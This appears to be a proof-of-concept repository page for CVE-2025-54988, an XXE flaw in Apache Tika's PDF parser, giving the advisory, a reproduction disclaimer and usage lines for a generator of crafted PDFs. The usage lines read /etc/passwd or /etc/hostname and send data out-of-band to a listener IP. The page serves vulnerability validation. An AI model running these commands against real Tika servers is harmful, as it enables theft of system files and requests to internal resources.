
CVE-2025-54988 PoC — Apache Tika PDF parser module: XXE vulnerability in PDFParser's handling of XFA

Source
Associated Vulnerability
Title: Apache Tika PDF parser module: XXE vulnerability in PDFParser's handling of XFA (CVE-2025-54988)
Description: Critical XXE in Apache Tika (tika-parser-pdf-module) in Apache Tika 1.13 through and including 3.2.1 on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside a PDF. An attacker may be able to read sensitive data or trigger malicious requests to internal resources or third-party servers. Note that the tika-parser-pdf-module is used as a dependency in several Tika packages including at least: tika-parsers-standard-modules, tika-parsers-standard-package, tika-app, tika-grpc and tika-server-standard. Users are recommended to upgrade to version 3.2.2, which fixes this issue.
Description
A PDF generator for CVE-2025-54988
Readme
# CVE-2025-54988 - POC
Disclaimer: I am not the original discoverer of this vulnerability. This post documents my process of reproducing the issue in a controlled environment for educational purposes and to help others validate their own systems.
The tests were conducted in an isolated lab with no impact to production systems.

Usage:

```
python3 xfa_xxe_poc_gen.py --mode file --file /etc/passwd -o xfa_passwd.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 127.0.0.1 --port 8888 --write-dtd -o xfa_oob.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 10.10.14.3 --port 8080 --oob-file /etc/hostname --param d
```

File Snapshot

```
[4.0K] /data/pocs/34fb2b52b2daff87fc813705bcc409f4dbcc89dd
├── [ 749] README.md
├── [1010] xfa_passwd.pdf
└── [5.9K] xfa_xxe_poc_gen.py

0 directories, 3 files
```